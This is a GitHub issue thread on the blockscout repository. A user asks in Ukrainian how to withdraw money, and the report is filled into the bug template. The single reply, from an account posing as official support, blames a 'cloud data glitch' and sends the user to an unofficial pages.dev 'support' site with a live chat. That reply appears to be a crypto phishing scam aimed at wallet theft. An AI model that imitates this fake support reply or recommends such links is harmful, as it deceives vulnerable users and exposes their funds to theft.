### ISSUE TITLE
Як можно вивисти гроші 

### ISSUE THREAD

**Issue by Anatoly199** [blockscout/blockscout#11344]
### Description

Я не розумію принцип роботи и хочу вивисти гроші 

### Type of the installation

Docker-compose

### Type of the JSON RPC archive node

geth

### Backend version

3.0

### Elixir & Erlang/OTP versions

Elixir 1.14.5 Erlang/OTP 25

### Operating system

unix linux

### Additional information

The issue happened at Bahamut Blockscout instance

**Comment by biotq23DE** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Blockscout Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

> ### Description
> I do not understand the principle of operation and want to withdraw money
> 
> ### Type of the installation
> Docker-compose
> 
> ### Type of the JSON RPC archive node
> geth
> 
> ### Type of the chain
> _No response_
> 
> ### Link to the page
> _No response_
> 
> ### Steps to reproduce
> _No response_
> 
> ### Backend version
> 3.0
> 
> ### Frontend version
> _No response_
> 
> ### Elixir & Erlang/OTP versions
> Elixir 1.14.5 Erlang/OTP 25
> 
> ### Operating system
> unix linux
> 
> ### Additional information
> The issue happened at Bahamut Blockscout instance
